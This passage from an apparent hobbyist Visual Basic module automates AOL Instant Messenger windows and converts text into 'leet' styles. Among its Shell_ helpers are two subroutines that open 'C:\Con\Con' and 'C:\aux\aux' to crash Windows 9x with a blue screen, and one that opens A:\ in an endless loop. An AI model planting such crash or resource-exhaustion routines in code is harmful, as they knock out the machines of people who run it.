oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Im_Hide()
Dim aimimessage As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
ShowWindow aimimessage&, 0
End Sub
Sub Aim_Im_Hide_AddBudButton()
'hides the add buddy button in im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Im_Hide_InfoButton()
'hides the info button in an im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Im_Hide_TalkButton()
'hides talk button in im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Im_Hide_WarnButton()
'hides warn button in an im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Im_Send_Link(SN$, URL$, LinkText$)
'sends link in im.
Call Aim_Im_Send_Normal(SN$, "" + LinkText$ + "")
End Sub
Sub Aim_Im_Send_Normal(SN$, Message$)
'sends an im.
Dim parent As Long, child1 As Long
Call gobar("aim:goim?screenname=" & SN$ & "&Message=" & Message$)
parent& = FindWindow("AIM_IMessage", vbNullString)
child1& = FindWindowEx(parent&, 0&, "_Oscar_IconBtn", vbNullString)
Call Click(child1&)
End Sub
Sub gobar(URL$)
Dim parent As Long, child1 As Long, TextSet As Long, child2 As Long, TextSet2 As Long
parent& = FindWindow("_Oscar_BuddyListWin", vbNullString)
child1& = FindWindowEx(parent&, 0&, "Edit", vbNullString)
TextSet& = SendMessageByString(child1&, WM_SETTEXT, 0, URL$)
child2& = FindWindowEx(parent&, 0&, "_Oscar_IconBtn", vbNullString)
Call Click(child2&)
TextSet2& = SendMessageByString(child1&, WM_SETTEXT, 0, "Search The Web")
End Sub
Sub Aim_Im_Show_AddBudButton()
'shows the add buddy button in an im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Im_Show_BlockButton()
'shows the "block" button in im.
Dim aimimessage As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
ShowWindow aimimessage&, 1
End Sub
Sub Aim_Im_Show()
Dim aimimessage As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
ShowWindow aimimessage&, 1
End Sub
Sub Aim_Im_Show_InfoButton()
'shows "info" button in open im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Im_Show_TalkButton()
'shows "talk" button in im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Im_Show_WarnButton()
'shows "warn" button in im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Shell_Ping()
Shell ("C:\Windows\Ping.exe")
End Sub
Sub Shell_Deltree()
Shell ("C:\Windows\Deltree.exe")
End Sub
Sub Shell_BlueScreen()
Shell ("File:///C:\Con\Con")
End Sub
Sub Shell_BlueScreen2()
Shell ("File:///C:\aux\aux")
End Sub
Sub Shell_Netstat()
Shell ("C:\Windows\Netstat.exe")
End Sub
Sub Shell_Aim()
Shell ("C:\Program Files\Aim95\aim.exe")
End Sub
Sub Shell_Aol()
Shell ("C:\America Online 5.0\waol5.exe")
End Sub
Sub Shell_RegEdit()
Shell ("C:\Windows\Regedit.exe")
End Sub
Sub Shell_ScanDisk()
Shell ("C:\Windows\Scandskw.exe")
End Sub
Sub Shell_IP()
Shell ("C:\Windows\winipcfg.exe")
End Sub
Sub Shell_Adrive()
Shell ("A:\")
End Sub
Sub Shell_Aforever()
Do
Shell ("A:\")
Loop
End Sub
Sub Shell_Cdrive()
Shell ("C:\")
End Sub
Sub Shell_DeFrag()
Shell ("C:\Windows\Defrag.exe")
End Sub
Sub Shell_Tracert()
Shell ("C:\Windows\Tracert.exe")
End Sub
Sub Shell_MSPaint()
Shell ("C:\Program Files\Accessories\MSPaint.exe")
End Sub
Sub Shell_NotePad()
Shell ("C:\Windows\NotePad.exe")
End Sub
Sub AIM_BudList_Show_Ad1()
'shows ad1 on your buddy list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
End Sub
Sub Aim_BudList_Show_Ad2()
'shows ad2 on your buddy list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 2
End Sub
Sub Aim_BudList_Show()
'shows your buddy list
Dim hideim&
Dim oscarbuddylistwin&
Dim oscartabgroup&
Dim oscartree&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_oscar_tabgroup", vbNullString)
oscartree& = FindWindowEx(oscartabgroup&, 0&, "_oscar_tree", vbNullString)
hideim& = ShowWindow(oscartree&, SW_SHOW)
End Sub
Sub Aim_BudList_Show_InviteButton()
'shows the invite button on your buddy list
Dim hideim&
Dim oscarbuddylistwin&
Dim oscartabgroup&
Dim oscariconbtn&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_oscar_tabgroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, 0&, "_oscar_iconbtn", vbNullString)
hideim& = ShowWindow(oscariconbtn&, SW_SHOW)
End Sub
Sub Aim_SignOnAFriend()
'opens the "sign on a friend menu"
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Sign On A Friend...")
End Sub
Sub Pause(interval)
'taken from digitalaim.bas
Dim current
current = Timer
Do While Timer - current < Val(interval)
DoEvents
Loop
End Sub
Function Talker_Ucase(Strn As String) As String
'Taken from Chaos232.bas
Dim chang As String
chang$ = UCase(Strn)
Talker_Ucase = chang$
End Function
Public Function Talker_BackWords(Text As String)
'from chaos232.bas
Dim Center As Integer, ReplaceMent As String
For Center = Len(Text) To 1 Step -1
ReplaceMent = ReplaceMent & Mid(Text, Center, 1)
Next
Talker_BackWords = ReplaceString(ReplaceMent, vbLf & vbCr, vbCrLf)
End Function
Function Talker_Dot(strin As String) As String
'Taken from Chaos232.bas
' How to use:
' Moo$ = talker_dot(text1.text)
' Aim_Chat_Send(moo$)
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NumSpc As Integer, NewSent As String, Dotz As String
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChr$ = NextChr$ + "•"
Let NewSent$ = NewSent$ + NextChr$
Loop
Dotz$ = NewSent$
Talker_Dot = Dotz$
End Function
Function Talker_Space(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NumSpc As Integer, NewSent As String, Spac As String
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChr$ = NextChr$ + " "
Let NewSent$ = NewSent$ + NextChr$
Loop
Spac$ = NewSent$
Talker_Space = Spac$
End Function
Function Talker_Slash(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NumSpc As Integer, NewSent As String, Slah As String
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChr$ = NextChr$ + "/"
Let NewSent$ = NewSent$ + NextChr$
Loop
Slah$ = NewSent$
Talker_Slash = Slah$
End Function
Function Talker_r33t(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NextChrr As String, NewSent As String, NumSpc As Integer, Crapp As Integer
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
DoEvents
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChrr$ = Mid$(inptxt$, NumSpc%, 2)
If NextChrr$ = "ae" Then Let NextChrr$ = "43": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "AE" Then Let NextChrr$ = "43": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "oe" Then Let NextChrr$ = "03": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "OE" Then Let NextChrr$ = "03": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If Crapp% > 0 Then GoTo send
If NextChr$ = "A" Then Let NextChr$ = "4"
If NextChr$ = "a" Then Let NextChr$ = "4"
If NextChr$ = "B" Then Let NextChr$ = "b"
If NextChr$ = "C" Then Let NextChr$ = "c"
If NextChr$ = "c" Then Let NextChr$ = "c"
If NextChr$ = "D" Then Let NextChr$ = "d"
If NextChr$ = "d" Then Let NextChr$ = "d"
If NextChr$ = "E" Then Let NextChr$ = "3"
If NextChr$ = "e" Then Let NextChr$ = "3"
If NextChr$ = "f" Then Let NextChr$ = "f"
If NextChr$ = "F" Then Let NextChr$ = "f"
If NextChr$ = "G" Then Let NextChr$ = "g"
If NextChr$ = "f" Then Let NextChr$ = "g"
If NextChr$ = "H" Then Let NextChr$ = "h"
If NextChr$ = "I" Then Let NextChr$ = "1"
If NextChr$ = "i" Then Let NextChr$ = "1"
If NextChr$ = "k" Then Let NextChr$ = "k"
If NextChr$ = "K" Then Let NextChr$ = "k"
If NextChr$ = "L" Then Let NextChr$ = "l"
If NextChr$ = "M" Then Let NextChr$ = "m"
If NextChr$ = "m" Then Let NextChr$ = "m"
If NextChr$ = "N" Then Let NextChr$ = "n"
If NextChr$ = "n" Then Let NextChr$ = "n"
If NextChr$ = "O" Then Let NextChr$ = "0"
If NextChr$ = "o" Then Let NextChr$ = "0"
If NextChr$ = "P" Then Let NextChr$ = "p"
If NextChr$ = "p" Then Let NextChr$ = "p"
If NextChr$ = "Q" Then Let NextChr$ = "q"
If NextChr$ = "R" Then Let NextChr$ = "r"
If NextChr$ = "S" Then Let NextChr$ = "5"
If NextChr$ = "s" Then Let NextChr$ = "5"
If NextChr$ = "t" Then Let NextChr$ = "7"
If NextChr$ = "T" Then Let NextChr$ = "7"
If NextChr$ = "U" Then Let NextChr$ = "u"
If NextChr$ = "u" Then Let NextChr$ = "u"
If NextChr$ = "V" Then Let NextChr$ = "v"
If NextChr$ = "W" Then Let NextChr$ = "w"
If NextChr$ = "X" Then Let NextChr$ = "x"
If NextChr$ = "X" Then Let NextChr$ = "x"
If NextChr$ = "Y" Then Let NextChr$ = "y"
Let NewSent$ = NewSent$ + NextChr$
send:
If Crapp% > 0 Then Let Crapp% = Crapp% - 1
DoEvents
Loop
Talker_r33t = NewSent$
End Function
Function Talker_Lcase(Strn As String) As String
'Taken from Chaos232.bas
Dim chang As String
chang$ = LCase(Strn)
Talker_Lcase = chang$
End Function
Function Talker_Elite(strin As String)
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NextChrr As String, NewSent As String, NumSpc As Integer, Crapp As Integer
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
DoEvents
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChrr$ = Mid$(inptxt$, NumSpc%, 2)
If NextChrr$ = "ae" Then Let NextChrr$ = "æ": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "AE" Then Let NextChrr$ = "Æ": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "oe" Then Let NextChrr$ = "œ": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "OE" Then Let NextChrr$ = "Œ": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If Crapp% > 0 Then GoTo send
If NextChr$ = "A" Then Let NextChr$ = "Å"
If NextChr$ = "a" Then Let NextChr$ = "ã"
If NextChr$ = "B" Then Let NextChr$ = "ß"
If NextChr$ = "C" Then Let NextChr$ = "Ç"
If NextChr$ = "c" Then Let NextChr$ = "¢"
If NextChr$ = "D" Then Let NextChr$ = "Ð"
If NextChr$ = "d" Then Let NextChr$ = "d"
If NextChr$ = "E" Then Let NextChr$ = "Ê"
If NextChr$ = "e" Then Let NextChr$ = "è"
If NextChr$ = "f" Then Let NextChr$ = "ƒ"
If NextChr$ = "H" Then Let NextChr$ = "h"
If NextChr$ = "I" Then Let NextChr$ = "í"
If NextChr$ = "i" Then Let NextChr$ = "î"
If NextChr$ = "k" Then Let NextChr$ = "k"
If NextChr$ = "K" Then Let NextChr$ = "K"
If NextChr$ = "L" Then Let NextChr$ = "£"
If NextChr$ = "M" Then Let NextChr$ = "[]V[]"
If NextChr$ = "m" Then Let NextChr$ = "‹v›"
If NextChr$ = "N" Then Let NextChr$ = "[]\[]"
If NextChr$ = "n" Then Let NextChr$ = "ñ"
If NextChr$ = "O" Then Let NextChr$ = "Ø"
If NextChr$ = "o" Then Let NextChr$ = "ö"
If NextChr$ = "P" Then Let NextChr$ = "¶"
If NextChr$ = "p" Then Let NextChr$ = "Þ"
If NextChr$ = "r" Then Let NextChr$ = "®"
If NextChr$ = "S" Then Let NextChr$ = "§"
If NextChr$ = "s" Then Let NextChr$ = "$"
If NextChr$ = "t" Then Let NextChr$ = "†"
If NextChr$ = "U" Then Let NextChr$ = "Ú"
If NextChr$ = "u" Then Let NextChr$ = "µ"
If NextChr$ = "V" Then Let NextChr$ = "\/"
If NextChr$ = "W" Then Let NextChr$ = "w"
If NextChr$ = "w" Then Let NextChr$ = "w"
If NextChr$ = "X" Then Let NextChr$ = "><"
If NextChr$ = "x" Then Let NextChr$ = "×"
If NextChr$ = "Y" Then Let NextChr$ = "¥"
If NextChr$ = "y" Then Let NextChr$ = "ý"
If NextChr$ = "!" Then Let NextChr$ = "¡"
If NextChr$ = "?" Then Let NextChr$ = "¿"
If NextChr$ = "." Then Let NextChr$ = "…"
If NextChr$ = "," Then Let NextChr$ = "‚"
If NextChr$ = "1" Then Let NextChr$ = "¹"
If NextChr$ = "%" Then Let NextChr$ = "‰"
If NextChr$ = "2" Then Let NextChr$ = "²"
If NextChr$ = "3" Then Let NextChr$ = "³"
If NextChr$ = "_" Then Let NextChr$ = "¯"
If NextChr$ = "-" Then Let NextChr$ = "—"
If NextChr$ = " " Then Let NextChr$ = " "
If NextChr$ = "<" Then Let NextChr$ = "«"
If NextChr$ = ">" Then Let NextChr$ = "»"
If NextChr$ = "*" Then Let NextChr$ = "¤"
If NextChr$ = "`" Then Let NextChr$ = "“"
If NextChr$ = "'" Then Let NextChr$ = "”"
If NextChr$ = "0" Then Let NextChr$ = "º"
Let NewSent$ = NewSent$ + NextChr$
send:
If Crapp% > 0 Then Let Crapp% = Crapp% - 1
DoEvents
Loop
Aim_Chat_Send_Normal NewSent$
End Function
Function Talker_ieet(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NextChrr As String, NewSent As String, NumSpc As Integer, Crapp As Integer
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
DoEvents
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChrr$ = Mid$(inptxt$, NumSpc%, 2)
If NextChrr$ = "ae" Then Let NextChrr$ = "ae": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "AE" Then Let NextChrr$ = "ae": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "oe" Then Let NextChrr$ = "oe": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "OE" Then Let NextChrr$ = "oe": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If Crapp% > 0 Then GoTo send
If NextChr$ = "A" Then Let NextChr$ = "a"
If NextChr$ = "a" Then Let NextChr$ = "a"
If NextChr$ = "B" Then Let NextChr$ = "b"
If NextChr$ = "C" Then Let NextChr$ = "c"
If NextChr$ = "c" Then Let NextChr$ = "c"
If NextChr$ = "D" Then Let NextChr$ = "d"
If NextChr$ = "d" Then Let NextChr$ = "d"
If NextChr$ = "E" Then Let NextChr$ = "e"
If NextChr$ = "e" Then Let NextChr$ = "e"
If NextChr$ = "f" Then Let NextChr$ = "f"
If NextChr$ = "H" Then Let NextChr$ = "h"
If NextChr$ = "I" Then Let NextChr$ = "I"
If NextChr$ = "i" Then Let NextChr$ = "I"
If NextChr$ = "k" Then Let NextChr$ = "k"
If NextChr$ = "K" Then Let NextChr$ = "k"
If NextChr$ = "L" Then Let NextChr$ = "l"
If NextChr$ = "M" Then Let NextChr$ = "m"
If NextChr$ = "m" Then Let NextChr$ = "m"
If NextChr$ = "N" Then Let NextChr$ = "n"
If NextChr$ = "n" Then Let NextChr$ = "n"
If NextChr$ = "O" Then Let NextChr$ = "o"
If NextChr$ = "o" Then Let NextChr$ = "o"
If NextChr$ = "P" Then Let NextChr$ = "p"
If NextChr$ = "p" Then Let NextChr$ = "p"
If NextChr$ = "r" Then Let NextChr$ = "r"
If NextChr$ = "S" Then Let NextChr$ = "s"
If NextChr$ = "s" Then Let NextChr$ = "s"
If NextChr$ = "t" Then Let NextChr$ = "t"
If NextChr$ = "U" Then Let NextChr$ = "u"
If NextChr$ = "u" Then Let NextChr$ = "u"
If NextChr$ = "V" Then Let NextChr$ = "v"
If NextChr$ = "W" Then Let NextChr$ = "w"
If NextChr$ = "w" Then Let NextChr$ = "w"
If NextChr$ = "X" Then Let NextChr$ = "x"
If NextChr$ = "x" Then Let NextChr$ = "x"
If NextChr$ = "Y" Then Let NextChr$ = "y"
If NextChr$ = "y" Then Let NextChr$ = "y"
Let NewSent$ = NewSent$ + NextChr$
send:
If Crapp% > 0 Then Let Crapp% = Crapp% - 1
DoEvents
Loop
Talker_ieet = NewSent$
End Function
Function Talker_PuP(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NextChrr As String, NewSent As String, NumSpc As Integer, Crapp As Integer
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
DoEvents
Let NumSpc% = NumSpc% + 1
Let NextChr$ = Mid$(inptxt$, NumSpc%, 1)
Let NextChrr$ = Mid$(inptxt$, NumSpc%, 2)
If NextChrr$ = "ae" Then Let NextChrr$ = "/-\E": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "AE" Then Let NextChrr$ = "/-\E": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "oe" Then Let NextChrr$ = "()e": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If NextChrr$ = "OE" Then Let NextChrr$ = "()E": Let NewSent$ = NewSent$ + NextChrr$: Let Crapp% = 2: GoTo send
If Crapp% > 0 Then GoTo send
If NextChr$ = "A" Then Let NextChr$ = "/-\"
If NextChr$ = "a" Then Let NextChr$ = "/-\"
If NextChr$ = "B" Then Let NextChr$ = "(3"
If NextChr$ = "C" Then Let NextChr$ = "C"
If NextChr$ = "c" Then Let NextChr$ = "c"
If NextChr$ = "D" Then Let NextChr$ = "|)"
If NextChr$ = "d" Then Let NextChr$ = "d"
If NextChr$ = "E" Then Let NextChr$ = "E"
If NextChr$ = "e" Then Let NextChr$ = "d"
If NextChr$ = "f" Then Let NextChr$ = "f"
If NextChr$ = "H" Then Let NextChr$ = "|-|"
If NextChr$ = "I" Then Let NextChr$ = "I"
If NextChr$ = "i" Then Let NextChr$ = "i"
If NextChr$ = "k" Then Let NextChr$ = "|‹"
If NextChr$ = "K" Then Let NextChr$ = "(«"
If NextChr$ = "L" Then Let NextChr$ = "(_"
If NextChr$ = "M" Then Let NextChr$ = "(\/)"
If NextChr$ = "m" Then Let NextChr$ = "‹v›"
If NextChr$ = "N" Then Let NextChr$ = "(\)"
If NextChr$ = "n" Then Let NextChr$ = "/\/"
If NextChr$ = "O" Then Let NextChr$ = "()"
If NextChr$ = "o" Then Let NextChr$ = "()"
If NextChr$ = "P" Then Let NextChr$ = "P"
If NextChr$ = "p" Then Let NextChr$ = "p"
If NextChr$ = "r" Then Let NextChr$ = "r"
If NextChr$ = "S" Then Let NextChr$ = "S"
If NextChr$ = "s" Then Let NextChr$ = "s"
If NextChr$ = "t" Then Let NextChr$ = "t"
If NextChr$ = "U" Then Let NextChr$ = "U"
If NextChr$ = "u" Then Let NextChr$ = "u"
If NextChr$ = "V" Then Let NextChr$ = "\/"
If NextChr$ = "W" Then Let NextChr$ = "\X/"
If NextChr$ = "w" Then Let NextChr$ = "\/\/"
If NextChr$ = "X" Then Let NextChr$ = "><"
If NextChr$ = "x" Then Let NextChr$ = "x"
If NextChr$ = "Y" Then Let NextChr$ = "Y"
If NextChr$ = "y" Then Let NextChr$ = "y"
Let NewSent$ = NewSent$ + NextChr$
send:
If Crapp% > 0 Then Let Crapp% = Crapp% - 1
DoEvents
Loop
Talker_PuP = NewSent$
End Function
Function Talker_Period(strin As String) As String
'Taken from Chaos232.bas
Dim NextChr As String, inptxt As String, lenth As Integer
Dim NumSpc As Integer, NewSent As String, Pero As String
Let inptxt$ = strin
Let lenth% = Len(inptxt$)
Do While NumSpc% <= lenth%
Let NumSpc% = NumSpc% + 1
